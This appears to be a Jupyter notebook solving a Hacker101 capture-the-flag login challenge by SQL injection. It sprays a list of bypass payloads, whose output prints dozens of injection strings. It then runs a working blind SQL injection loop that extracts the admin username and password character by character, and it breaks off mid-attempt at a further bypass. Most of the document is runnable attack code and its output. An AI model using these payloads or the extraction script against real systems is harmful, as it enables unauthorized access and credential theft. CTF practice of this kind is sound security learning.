# Setup

In [1]:
#Grab the file with basic SQL Injections
SQLI_basic_path = "../../library/text_files/SQL_bypass.txt"

with open(SQLI_basic_path, "r") as f:
    SQLI = f.readlines()
SQLI = [x.replace("\n", "") for x in SQLI]

In [2]:
import requests
import time
from tqdm import tqdm

URL = "http://34.94.3.143/7a0dd395ea/login"
#From https://ctf.hacker101.com/ctf

# First Pass

In [3]:
SQLI_un_arr = SQLI
SQLI_pw_arr = [""]
results = []

#Try every combination of username and passwords
for SQLI_un in SQLI_un_arr:
    for SQLI_pw in SQLI_pw_arr:

        #Post request
        data = {'username': SQLI_un, 'password': SQLI_pw}
        r = requests.post(URL, data=data)

        results.append({'un' : SQLI_un, 'pw' : SQLI_pw, 'response' : r, 'text' : r.text})

In [4]:
results_breakdown = {"sql_u":[], "sql_p":[], "unk_u":[], "inv_p":[], "other":[]}
for q in results:
    response_text = q['text']

    #SQL Error Username
    if "SELECT password FROM admins WHERE username" in response_text:
        results_breakdown["sql_u"].append(q['un'])

    #Unknown User
    elif "Unknown user" in response_text:
        results_breakdown["unk_u"].append(q['un'])

    #Invalid Password
    elif "Invalid password" in response_text:
        results_breakdown["inv_p"].append(q['un'])

    #Other (Success?)`
    else:
        results_breakdown["other"].append(q)
        
    if "FLAG" in r.text:
        print("Flag detected")

In [5]:
results_breakdown

{'sql_u': ["' or true--",
  "') or true--",
  "') or ('x')=('x",
  "')) or (('x'))=(('x",
  "admin' --",
  "admin'/*",
  "admin' or '1'='1'--",
  "admin' or '1'='1'/*",
  "admin' or 1=1",
  "admin' or 1=1--",
  "admin' or 1=1/*",
  "admin') or ('1'='1",
  "admin') or ('1'='1'--",
  "admin') or ('1'='1'#",
  "admin') or ('1'='1'/*",
  "admin') or '1'='1",
  "admin') or '1'='1'--",
  "admin') or '1'='1'#",
  "admin') or '1'='1'/*",
  "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"],
 'sql_p': [],
 'unk_u': ["' '",
  "' or ''-'",
  "' or '' '",
  "' or ''&'",
  "' or ''^'",
  "' or ''*'",
  '"-"',
  '" "',
  '"&"',
  '"^"',
  '"*"',
  '" or ""-"',
  '" or "" "',
  '" or ""&"',
  '" or ""^"',
  '" or ""*"',
  'or true--',
  '" or true--',
  '") or true--',
  '" or "x"="x',
  '") or ("x")=("x',
  '")) or (("x"))=(("x',
  'or 1=1',
  'or 1=1--',
  'or 1=1#',
  'or 1=1/*',
  "admin' #",
  'admin" --',
  'admin" #',
  'admin"/*',
  'admin" or "1"="1',
  'admin" or 

In [6]:
#Counts
for each_key in results_breakdown.keys():
    print(f"{each_key} : {len(results_breakdown[each_key])}")

sql_u : 20
sql_p : 0
unk_u : 48
inv_p : 9
other : 0


In [7]:
results_breakdown["inv_p"]

["'-'",
 "'&'",
 "'^'",
 "'*'",
 "' or 'x'='x",
 "admin' or '1'='1",
 "admin' or '1'='1'#",
 "admin'or 1=1 or ''='",
 "admin' or 1=1#"]

## Result
I'm currently not sure how to get any further with this approach. These usernames do not give access fully - the password check does not appear to be bypassed. None of these inputs bypass the password. Additionally I can't get the password check to throw an error, so I can't work out what the actual password query is. On to a different approach...

# Blind SQL Script
So the basic gist here is that we can use the following input for username:

```
' OR 1=1 #
```
And replace the "1=1" with any statement about the database. If we get a response with "unknown user" then the statement was false, otherwise if we get an "incorrect password" then the statement was true.

NB the SQL command that gets run is:

```sql
SELECT password 
FROM admins 
WHERE username= ...
```
```python
'\'%s\'' % request.form['username'].replace('%', '%%')
```





## Username

In [8]:
#NB this could be sped up with binary search
#Assumes no whitespace

#Loop through all characters to find admin username:
import string

username = ""
idx = 0
while(1):
    found = 0
    idx += 1
    for each_letter in string.printable.strip():

        statement_to_eval = f"SUBSTRING(username, {idx}, 1) = \'{each_letter}\'"
        SQLI_un = f"\' OR {statement_to_eval} #"
        SQLI_pw = ""

        #Post request
        data = {'username': SQLI_un, 'password': SQLI_pw}
        r = requests.post(URL, data=data)

        if "Invalid password" in r.text:
            #This means our query has resolved to True
            print(each_letter)
            username += each_letter
            found = 1
            break
        elif "Unknown user" in r.text:
            pass
        else:
            print(r.text)
            
    #Break if we didn't find a character (string is complete)
    if found == 0:
        break
    
print(username)

e
a
r
n
e
s
t
i
n
e
earnestine


In [9]:
#Loop through all characters to find admin password:
import string

password = ""
idx = 0
search = 1
while(search):
    found = 0
    idx += 1
    for each_letter in string.printable.strip():

        statement_to_eval = f"SUBSTRING(password, {idx}, 1) = \'{each_letter}\'"
        SQLI_un = f"\' OR {statement_to_eval} #"
        SQLI_pw = ""

        #Post request
        data = {'username': SQLI_un, 'password': SQLI_pw}
        r = requests.post(URL, data=data)

        if "Invalid password" in r.text:
            #This means our query has resolved to True
            print(each_letter)
            password += each_letter
            found = 1
            break
        elif "Unknown user" in r.text:
            pass
        else:
            print(r.text)
            
    #Break if we didn't find a character (string is complete)
    if found == 0:
        search = 0
    
print(password)

d
u
s
t
i
n
dustin


# Bypass attempt 2

In [10]:
SQLI_un = "' OR username = (SELECT username FROM admins LIMIT 1)#"